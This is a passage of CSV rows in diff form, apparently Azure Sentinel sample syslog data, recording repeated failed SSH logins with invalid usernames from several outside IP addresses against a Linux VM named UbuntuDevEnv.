+18585,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:31:26,UbuntuDevEnv,2019-06-26 10:31:26,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,85735,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+18586,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:31:26,UbuntuDevEnv,2019-06-26 10:31:26,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=37.59.6.106,85735,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,37.59.6.1,,0,
+18587,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:31:29,UbuntuDevEnv,2019-06-26 10:31:28,auth,UbuntuDevEnv,info,Failed password for invalid user nei from 37.59.6.106 port 39438 ssh2,85735,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,nei,37.59.6.1,39438,,
+18588,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:31:29,UbuntuDevEnv,2019-06-26 10:31:28,auth,UbuntuDevEnv,info,Disconnected from invalid user nei 37.59.6.106 port 39438 [preauth],85735,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,nei,37.59.6.1,39438,,
+18589,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:31:29,UbuntuDevEnv,2019-06-26 10:31:28,auth,UbuntuDevEnv,info,Received disconnect from 37.59.6.106 port 39438:11: Bye Bye [preauth],85735,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,37.59.6.1,39438,,
+18590,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:31:33,UbuntuDevEnv,2019-06-26 10:31:32,auth,UbuntuDevEnv,info,Invalid user xavier from 200.209.174.76 port 54836,85753,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,xavier,200.209.174.7,54836,,
+18591,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:31:33,UbuntuDevEnv,2019-06-26 10:31:32,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,85753,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+18592,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:31:33,UbuntuDevEnv,2019-06-26 10:31:32,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=200.209.174.76,85753,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,200.209.174.7,,0,
+18593,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:31:35,UbuntuDevEnv,2019-06-26 10:31:35,auth,UbuntuDevEnv,info,Failed password for invalid user xavier from 200.209.174.76 port 54836 ssh2,85753,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,xavier,200.209.174.7,54836,,
+18594,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:31:35,UbuntuDevEnv,2019-06-26 10:31:35,auth,UbuntuDevEnv,info,Received disconnect from 200.209.174.76 port 54836:11: Bye Bye [preauth],85753,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,200.209.174.7,54836,,
+18595,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:31:35,UbuntuDevEnv,2019-06-26 10:31:35,auth,UbuntuDevEnv,info,Disconnected from invalid user xavier 200.209.174.76 port 54836 [preauth],85753,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,xavier,200.209.174.7,54836,,
+18596,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:32:17,UbuntuDevEnv,2019-06-26 10:32:17,auth,UbuntuDevEnv,info,Invalid user pop from 106.13.142.247 port 36902,85915,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,pop,106.13.142.2,36902,,
+18597,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:32:17,UbuntuDevEnv,2019-06-26 10:32:17,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,85915,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+18598,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:32:17,UbuntuDevEnv,2019-06-26 10:32:17,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=106.13.142.247,85915,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,106.13.142.2,,0,
+18599,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:32:19,UbuntuDevEnv,2019-06-26 10:32:19,auth,UbuntuDevEnv,info,Failed password for invalid user pop from 106.13.142.247 port 36902 ssh2,85915,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,pop,106.13.142.2,36902,,
+18600,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:32:20,UbuntuDevEnv,2019-06-26 10:32:19,auth,UbuntuDevEnv,info,Received disconnect from 106.13.142.247 port 36902:11: Bye Bye [preauth],85915,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,106.13.142.2,36902,,
+18601,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:32:20,UbuntuDevEnv,2019-06-26 10:32:19,auth,UbuntuDevEnv,info,Disconnected from invalid user pop 106.13.142.247 port 36902 [preauth],85915,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,pop,106.13.142.2,36902,,
+18602,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:32:37,UbuntuDevEnv,2019-06-26 10:32:37,auth,UbuntuDevEnv,info,Invalid user xavier from 47.44.115.81 port 60892,85978,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,xavier,47.44.115.8,60892,,
+18603,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:32:37,UbuntuDevEnv,2019-06-26 10:32:37,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,85978,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+18604,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:32:37,UbuntuDevEnv,2019-06-26 10:32:37,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=47.44.115.81,85978,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,47.44.115.8,,0,
+18605,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:32:39,UbuntuDevEnv,2019-06-26 10:32:39,auth,UbuntuDevEnv,info,Failed password for invalid user xavier from 47.44.115.81 port 60892 ssh2,85978,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,xavier,47.44.115.8,60892,,
+18606,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:32:39,UbuntuDevEnv,2019-06-26 10:32:39,auth,UbuntuDevEnv,info,Received disconnect from 47.44.115.81 port 60892:11: Bye Bye [preauth],85978,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,47.44.115.8,60892,,
+18607,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:32:39,UbuntuDevEnv,2019-06-26 10:32:39,auth,UbuntuDevEnv,info,Disconnected from invalid user xavier 47.44.115.81 port 60892 [preauth],85978,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,xavier,47.44.115.8,60892,,
+18608,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:33:00,UbuntuDevEnv,2019-06-26 10:32:59,auth,UbuntuDevEnv,info,Invalid user deploy from 37.59.6.106 port 56350,86067,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,deploy,37.59.6.1,56350,,
+18609,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:33:00,UbuntuDevEnv,2019-06-26 10:32:59,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=37.59.6.106,86067,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,37.59.6.1,,0,
+18610,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:33:00,UbuntuDevEnv,2019-06-26 10:32:59,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,86067,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+18611,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:33:02,UbuntuDevEnv,2019-06-26 10:33:01,auth,UbuntuDevEnv,info,Failed password for invalid user deploy from 37.59.6.106 port 56350 ssh2,86067,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,deploy,37.59.6.1,56350,,
+18612,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:33:02,UbuntuDevEnv,2019-06-26 10:33:01,auth,UbuntuDevEnv,info,Disconnected from invalid user deploy 37.59.6.106 port 56350 [preauth],86067,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,deploy,37.59.6.1,56350,,
+18613,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:33:02,UbuntuDevEnv,2019-06-26 10:33:01,auth,UbuntuDevEnv,info,Received disconnect from 37.59.6.106 port 56350:11: Bye Bye [preauth],86067,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,37.59.6.1,56350,,
+18614,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:33:57,UbuntuDevEnv,2019-06-26 10:33:56,auth,UbuntuDevEnv,info,Invalid user tim from 106.13.142.247 port 49152,86262,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,tim,106.13.142.2,49152,,
+18615,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:33:57,UbuntuDevEnv,2019-06-26 10:33:56,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=106.13.142.247,86262,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,106.13.142.2,,0,
+18616,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:33:57,UbuntuDevEnv,2019-06-26 10:33:56,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,86262,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+18617,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:33:59,UbuntuDevEnv,2019-06-26 10:33:59,auth,UbuntuDevEnv,info,Failed password for invalid user tim from 106.13.142.247 port 49152 ssh2,86262,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,tim,106.13.142.2,49152,,
+18618,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:34:00,UbuntuDevEnv,2019-06-26 10:33:59,auth,UbuntuDevEnv,info,Received disconnect from 106.13.142.247 port 49152:11: Bye Bye [preauth],86262,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,106.13.142.2,49152,,
+18619,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:34:00,UbuntuDevEnv,2019-06-26 10:33:59,auth,UbuntuDevEnv,info,Disconnected from invalid user tim 106.13.142.247 port 49152 [preauth],86262,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,tim,106.13.142.2,49152,,
+18620,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:34:20,UbuntuDevEnv,2019-06-26 10:34:20,auth,UbuntuDevEnv,info,Invalid user dspace from 200.209.174.76 port 35059,86356,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,dspace,200.209.174.7,35059,,
+18621,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:34:20,UbuntuDevEnv,2019-06-26 10:34:20,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,86356,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+18622,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:34:20,UbuntuDevEnv,2019-06-26 10:34:20,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=200.209.174.76,86356,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,200.209.174.7,,0,
+18623,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:34:23,UbuntuDevEnv,2019-06-26 10:34:22,auth,UbuntuDevEnv,info,Failed password for invalid user dspace from 200.209.174.76 port 35059 ssh2,86356,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,dspace,200.209.174.7,35059,,
+18624,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:34:23,UbuntuDevEnv,2019-06-26 10:34:23,auth,UbuntuDevEnv,info,Received disconnect from 200.209.174.76 port 35059:11: Bye Bye [preauth],86356,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,200.209.174.7,35059,,
+18625,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:34:23,UbuntuDevEnv,2019-06-26 10:34:23,auth,UbuntuDevEnv,info,Disconnected from invalid user dspace 200.209.174.76 port 35059 [preauth],86356,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,dspace,200.209.174.7,35059,,
+18626,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:34:28,UbuntuDevEnv,2019-06-26 10:34:28,auth,UbuntuDevEnv,info,Invalid user die from 37.59.6.106 port 45048,86383,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,die,37.59.6.1,45048,,
+18627,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:34:28,UbuntuDevEnv,2019-06-26 10:34:28,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=37.59.6.106,86383,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,37.59.6.1,,0,
+18628,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:34:28,UbuntuDevEnv,2019-06-26 10:34:28,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,86383,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+18629,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:34:29,UbuntuDevEnv,2019-06-26 10:34:29,auth,UbuntuDevEnv,info,Failed password for invalid user die from 37.59.6.106 port 45048 ssh2,86383,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,die,37.59.6.1,45048,,
+18630,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:34:29,UbuntuDevEnv,2019-06-26 10:34:29,auth,UbuntuDevEnv,info,Received disconnect from 37.59.6.106 port 45048:11: Bye Bye [preauth],86383,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,37.59.6.1,45048,,
+18631,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:34:29,UbuntuDevEnv,2019-06-26 10:34:29,auth,UbuntuDevEnv,info,Disconnected from invalid user die 37.59.6.106 port 45048 [preauth],86383,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,die,37.59.6.1,45048,,
+18632,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:34:52,UbuntuDevEnv,2019-06-26 10:34:51,auth,UbuntuDevEnv,info,Invalid user esteban from 47.44.115.81 port 49910,86470,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,esteban,47.44.115.8,49910,,
+18633,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:34:52,UbuntuDevEnv,2019-06-26 10:34:51,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,86470,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+18634,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:34:52,UbuntuDevEnv,2019-06-26 10:34:51,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=47.44.115.81,86470,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,47.44.115.8,,0,
+18635,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:34:53,UbuntuDevEnv,2019-06-26 10:34:53,auth,UbuntuDevEnv,info,Failed password for invalid user esteban from 47.44.115.81 port 49910 ssh2,86470,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,esteban,47.44.115.8,49910,,
+18636,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:34:53,UbuntuDevEnv,2019-06-26 10:34:53,auth,UbuntuDevEnv,info,Received disconnect from 47.44.115.81 port 49910:11: Bye Bye [preauth],86470,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,47.44.115.8,49910,,
+18637,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:34:53,UbuntuDevEnv,2019-06-26 10:34:53,auth,UbuntuDevEnv,info,Disconnected from invalid user esteban 47.44.115.81 port 49910 [preauth],86470,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,esteban,47.44.115.8,49910,,
+18638,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:35:32,UbuntuDevEnv,2019-06-26 10:35:31,auth,UbuntuDevEnv,info,Invalid user croix from 106.13.142.247 port 33174,86601,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,croix,106.13.142.2,33174,,
+18639,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:35:32,UbuntuDevEnv,2019-06-26 10:35:31,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=106.13.142.247,86601,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,106.13.142.2,,0,
+18640,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:35:32,UbuntuDevEnv,2019-06-26 10:35:31,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,86601,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+18641,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:35:34,UbuntuDevEnv,2019-06-26 10:35:33,auth,UbuntuDevEnv,info,Failed password for invalid user croix from 106.13.142.247 port 33174 ssh2,86601,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,croix,106.13.142.2,33174,,
+18642,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:35:34,UbuntuDevEnv,2019-06-26 10:35:34,auth,UbuntuDevEnv,info,Received disconnect from 106.13.142.247 port 33174:11: Bye Bye [preauth],86601,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,106.13.142.2,33174,,
+18643,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:35:34,UbuntuDevEnv,2019-06-26 10:35:34,auth,UbuntuDevEnv,info,Disconnected from invalid user croix 106.13.142.247 port 33174 [preauth],86601,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,croix,106.13.142.2,33174,,
+18644,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:35:47,UbuntuDevEnv,2019-06-26 10:35:46,auth,UbuntuDevEnv,info,Invalid user semik from 200.209.174.76 port 39288,86663,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,semik,200.209.174.7,39288,,
